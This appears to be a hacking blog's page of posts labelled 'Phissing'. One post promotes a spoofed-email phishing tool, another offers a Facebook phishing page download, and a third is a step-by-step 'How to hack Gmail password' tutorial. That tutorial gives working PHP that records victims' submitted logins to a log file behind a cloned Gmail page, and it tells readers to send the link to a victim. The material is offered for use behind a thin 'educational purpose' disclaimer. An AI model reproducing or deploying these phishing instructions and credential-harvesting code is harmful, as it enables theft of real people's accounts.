Showing posts with label Phissing. Show all posts
Showing posts with label Phissing. Show all posts

Tuesday, February 4, 2014


SpearPhisher is a simple point and click Windows GUI tool designed for (mostly) non-technical people who would like to supplement the education and awareness aspect of their information security program.  Not only is it useful to non-technical folks, penetration testers may find it handy for sending quick and easy ad-hoc phishing emails.  The tool supports specifying different sending names and email addresses, multiple recipients via TO, CC, BCC, and allows bulk loading with one recipient email address per line in a file.  It allows customization of the subject, adding one attachment, and SSL support for SMTP enabled mail servers.  One of the popular features with our client is the WYSIWYG HTML editor that allows virtually anyone to use the tool; previewing results as you point and click edit your malicious email body.  If you want to add custom XSS exploits, client side attacks, or other payloads such as a Java Applet code generated by the Social Engineer Toolkit (SET), its split screen editor allows more advanced users to edit HTML directly.

An open relay is not necessarily required as many mail servers allow authenticated users to spoof email.  This is the beta release of the tool and has been tested in limited environments.

Download Link:-http://adf.ly/d5elS

Sunday, February 2, 2014

FACEBOOK PAKISTAN PHISHING PAGE

download

Tuesday, December 31, 2013

To Create a fake page for any website is known as Phishing Attack. It can be for various websites e.g Facebook, Twitter, Gmail, Yahoo, Hotmail etc. I have received many emails regarding fake/phisher page so this post is to clear doubts and problems regarding Fake Page For Any Website. This is for educational purpose we are not responsible for any illegal activity.
How to hack Gmail password:

 .

Step 1:

  • Open Gmail.com
  • Right click in an empty space on Page and Click view page source.
  • Copy all Content to Notepad & save it as Gmail.html
Untitled
.

Step 2:

  • Open Gmail.html with Notepad.
  • Press (Ctrl + f ) to Search “action=”https
Untitled
.

Step 3:

  • Replace this Syntax https://accounts.google.com/ServiceLoginAuth to login.php
  • Likewise change Method = “Post” to “GET” and Finally Save it.
Untitled
.
  • After Replacements It will Look like this.
.
Untitled
.

Step 4:

  • As we Have to create login.php, So
  • Open New Notepad & Copy Paste this following Code and Save it as login.php
  • <?php
     header ('Location: http://www.google.com');
     $handle = fopen("log.txt", "a");
     foreach($_GET as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, "=");
     fwrite($handle, $value);
     fwrite($handle, "\r\n");
     }
     fwrite($handle, "\r\n");
     fclose($handle);
     exit;
     ?>
.

Step 5:

  • Victim will be redirects to http://www.google.com as he Clicks on Login button.
  • You can change redirect button to any address you want.
.

Step 6:

.
Also Check : More HACKING Trick  HERE
.

Step 7:

  •  Upload both Files Gmail.html & login.php
Untitled
.

Step 8:

  • Now Send Gmail.html Link to Victim.
  • Once he Clicks Login Button, He will be redirected to Google.com, You can also change the site with your own desire.
.

Step 9:

  • File named log.txt will appear. Containing Victim’s Email and Password.
Untitled
.

Step 10:

  • Congrats You have Just Learns How to HACK Gmail password.
  • Hope you enjoyed this Tutorial. Like us on FaceBook.
Untitled
.

.
gmail-password-hacked
Subscribe to RSS Feed Follow me on Twitter!